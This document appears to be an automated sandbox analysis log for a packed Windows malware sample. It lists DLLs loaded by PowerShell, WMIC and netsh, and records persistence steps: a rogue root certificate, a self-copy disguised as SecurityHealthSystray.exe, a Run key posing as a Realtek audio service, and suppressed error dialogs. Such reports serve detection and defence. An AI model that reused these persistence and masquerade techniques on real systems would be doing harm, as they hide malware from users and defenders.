                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe ; Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe ; Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe ; Section loaded: umpdc.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe ; Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ; Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ; Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ; Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ; Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ; Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ; Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe ; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe ; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe ; Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe ; Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe ; Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe ; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\attrib.exe ; Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe ; Section loaded: fsutilext.dll
Source: C:\Windows\System32\wbem\WMIC.exe ; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: Window Recorder ; Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: WdlA0C4PkO.exe ; Static file information: File size 3469824 > 1048576
Source: WdlA0C4PkO.exe ; Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x34ee00
Source: WdlA0C4PkO.exe ; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.pdb source: powershell.exe, 00000012.00000002.1665126840.000001FC94B10000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: a1.pdbTa source: powershell.exe, 00000012.00000002.1738126119.000001FCAB7CF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.pdbhPR source: powershell.exe, 00000012.00000002.1665126840.000001FC94B10000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"
Source: WdlA0C4PkO.exe ; Static PE information: section name: UPX2
Source: SecurityHealthSystray.exe.0.dr ; Static PE information: section name: UPX2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF8878AD2A5 pushad ; iretd 12_2_00007FF8878AD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF8879C5073 pushad ; retf 12_2_00007FF8879C5083
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF8879C2395 pushad ; retf 12_2_00007FF8879C23C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF8879CB6A3 push edi; ret 12_2_00007FF8879CB692
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF8879CB693 push edi; ret 12_2_00007FF8879CB6A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF8879CBEF3 pushfd ; ret 12_2_00007FF8879CBEFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF8879C8A0A push ebx; retn 0009h 12_2_00007FF8879C8A2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF8879CB663 push edi; ret 12_2_00007FF8879CB692
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF8879CB5A3 push edx; ret 12_2_00007FF8879CB61A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF887A977B6 push ecx; ret 12_2_00007FF887A977B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 12_2_00007FF887A971C9 push ebx; retf 12_2_00007FF887A971CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 18_2_00007FF8879B5033 push ds; ret 18_2_00007FF8879B5062
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Code function: 18_2_00007FF8879B4FCA push ss; ret 18_2_00007FF8879B4FCC
Source: initial sample ; Static PE information: section name: UPX0
Source: initial sample ; Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\WdlA0C4PkO.exe ; Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe ; Process created: attrib.exe
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe ; File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ; File created: C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.dll
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe ; Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgr
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe ; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe ; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe ; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe ; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe ; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
